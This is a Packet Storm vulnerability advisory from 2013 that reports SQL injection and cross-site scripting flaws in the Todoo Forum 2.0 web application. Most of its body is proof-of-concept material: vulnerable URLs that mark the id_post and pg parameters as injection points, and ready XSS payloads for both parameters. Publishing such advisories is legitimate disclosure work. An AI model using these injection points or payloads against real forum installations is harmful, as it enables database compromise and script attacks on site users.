Todoo Forum 2.0 Cross Site Scripting / SQL Injection

2013-04-14T00:00:00
ID PACKETSTORM:121290
Type packetstorm
Reporter Chiekh Bouchenafa
Modified 2013-04-14T00:00:00

Description

                                        
                                            `  
[+] SQL Injection  
  
[+] Parameter : id_post  
  
[+] http://localhost/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=[Inject_here]&pg=1  
  
[+] Parameter : pg  
  
[+] http://localhost/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=1&pg=[Inject_Here]  
  
[+] Cross-site scripting  
  
[+] Parameter : id_post  
  
[+] http://localhost/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post='"--></style></script><script>alert(0x0000)</script>&pg=1   
  
[+] Parameter : pg  
  
[+] http://localhost/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=2&pg='"--></style></script><script>alert(0x0000)</script>   
  
  
  
`